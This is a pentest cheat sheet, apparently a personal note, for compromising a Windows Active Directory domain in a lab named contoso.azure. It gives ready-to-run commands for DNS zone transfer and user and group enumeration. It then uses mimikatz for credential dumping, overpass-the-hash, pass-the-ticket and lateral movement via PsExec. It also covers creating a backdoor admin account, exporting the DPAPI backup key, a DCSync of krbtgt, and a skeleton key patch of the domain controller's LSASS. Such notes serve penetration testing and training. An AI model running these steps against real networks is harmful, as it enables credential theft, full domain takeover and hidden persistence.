Windows Active Directory Pentest Toolkit

# Windows Active Directory Pentest Toolkit ###### tags: `cyber security` `windows` `active directory` `pentest` `nslookup` ## DNS stuff ### DNS transfers ```=1 # view the address of the dns server nslookup # view the fully qualified name of the returned server server <ip> e.g server 10.0.20.4.azure # attempt a zone transfer ls -d <domain> e.g ls -d contoso.azure ``` ### DNS Enumeration ```=9 # list all users in domain net user /domain # list details of a user e.g ace net user ace /domain # enumerate all groups in the domain net group /domain # enumerate only the domain admins group net group "Domain Admins" /domain # enumerate enterprise admins net group "Enterprise Admins" /domain ``` # SMB stuff ## SMB session enumeration * AD's Sysvol folder is one of the most important network shares in the environment. * Every computer and user must be able to access this particular network share to pull down group policies. * An attacker can get a goldmine of information from enumerating who has active sessions with the sysvol folder. A good recon goal would be to conduct smb session enumeration against a domain controller to learn who has sessions with the SMB share and from what IP. You can use JoeWare's NetSess tool for this from an admin lvl cmd prompt. ```=1 #start the NetSess tool NetSess NetSess.exe <domain controller> e.g NetSess.exe ContosoDC ``` ## Mimikatz ### Harvesting credentials This ideally can harvest credentials from user memory ```=1 # open an elevated cmd prompt and navigate to where mimikatz is mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> credentials.txt # check details for the user of interest e.g ace net user ace /domain ``` ### Overpass the hash A harvested NTLM hash, like one we would get from the process above, can be used to obtain a TGT which allows us to masquerade as that user. ```=7 mimikatz.exe "privilege::debug" "sekurlsa::pth /user:ace /ntlm:paste ntlm hash here /domain:contoso.azure" "exit" ``` A new command prompt opens executing as the compromised user. ### Power [to the] shell With the new command prompt obtained let's powershell ```=1 # start powershell powershell Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass # use a powersploit command Import-Module C:\tools\PowerSploit\PowerSploit-Master\PowerSploit.psm1 -Force #identify the local admins for the ip we discovered earlier that was exposed to a domain admin account, for our demo let's use 10.0.20.4 Get-NetLocalGroup 10.0.20.4 ``` If we have the right set of credentials we can laterally move to the admin pc based on the info we have at this point ```=11 # Access adminpc dir \\adminpc\c$ # see what tickets are available klist # look for the TGT in the results ``` By this point, the attack should have given us validated admin privileges thus we are set to move laterally to admin pc and harvest more credentials. ```=18 # stage mimikatz on the adminpc cd C:\tools\mimikatz\x64 xcopy mimikatz.exe \\adminpc\c$\temp # use a psexec command to remotely execute mimikatz # execute and export the tickets found in the LSASS.exe process and place them in the current directory on adminpc PsExec.exe \\AdminPc -accepteula cmd /c (cd c:\temp ^& mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit") # copy the tickets from the AdminPc to the victimpc, in this case we are only interested in luffy's ticket since he has access to the DC xcopy \\adminpc\c$\temp\*LuffyM* c:\temp\adminpc_tickets # in the prompt that pops up select Directory D # clean up rmdir \\adminpc\c$\temp /s /q ``` We can finally become Luffy by passing the ticket ```=36 # import Luffy's tickets mimikatz.exe "privilege::debug" "kerberos::ptt c:\temp\adminpc_tickets" "exit" # list available tickets to confirm we are now luffy klist ``` As the attacker we have successfully passed the ticket at this point. We harvested Luffy's credential from AdminPc and then passed it to another process running on VictimPc. However, these tickets remain unused. #### finish the attack ```=41 # Access the DC from victimpc dir \\ContosoDC\c$ ``` ## Establishing Domain Dominance Ensuring persistence on a domain to act as an insurance policy incase initial compromise and ensuing actions are discovered. An example is using WMI (windows management instrumentation) to create a process locally on the DC that creates a new user and password. ```=1 # use wmic to create a process to add sabo as a user wmic /node:ContosoDC process call create "net user /add Sabo p@ssw0rd1" # use remote powershell to add sabo to the administrators group on the DC powershell $s = New-PSSession -ComputerName ContosoDC Invoke-Command -Session $s -ScriptBlock {add-ADGroupMember -Identity "Administrators" -Members Sabo} exit ``` Windows uses the Data protection API (DPAPI) to **securely protect passwords saved by browsers, encrypted files, and other sensitive data** Domain controllers hold a master key that can decrypt all secrets on domain-joined windows machines. We can use mimikatz to export the master key from the DC ```=12 # export master key mimikatz.exe "privilege::debug" "lsadump::backupkeys /system:ContosoDC.contoso.azure /export" "exit" #confirm key has been exported dir ``` With this key we can decrypt any DPAPI encrypted file or sensitive data from any machine in the entire forest. ### Malicious Replication * Is a method that allows an attacker to replicate user information using Domain Admin or equivalent credentials. * It allows for the remote harvesting of credentials. * The most critical account to attempt to harvest is **krbtgt** as it is the master key used to sign all kerberos tickets. The two common hacking tools for this are: * mimikatz * impacket by core security ### mimikatz for malicious replication ```=17 # replicate the krbtgt account info to a plain text file mimikatz.exe "lsadump::dcsync /domain:contoso.azure /user:krbtgt" "exit" >> c:\temp\exportedkeys.txt ``` ### Skeleton Key Attacks * In this attack, users can still sign in with their normal password but each of their accounts is also given a master password. * The new master password / **skeleton key gives anyone who knows it the ability to masquerade as any user at any time.** * This attack is achieved by **patching the LSASS.exe process on the DC**, forcing users to authenticate via a downgraded encryption type. ```=1 # copy mimikatz to the DC xcopy mimikatz.exe \\ContosoDC\c$\temp # remotely execute mimikatz via psexec PsExec.exe \\ContosoDC -accepteula cmd /c (cd c:\temp ^& mimikatz.exe "privilege::debug" "misc::skeleton" ^& "exit") ``` This patches the LSASS process on the domain controller. At this point we can run whatever we want as whichever user we want using the skeleton key ```=6 # run calculator as ace runas /user:ace@contoso.azure "calculator" # provide the master password mimikatz ``` Skeleton key can be used for any account including service accounts and computer accounts.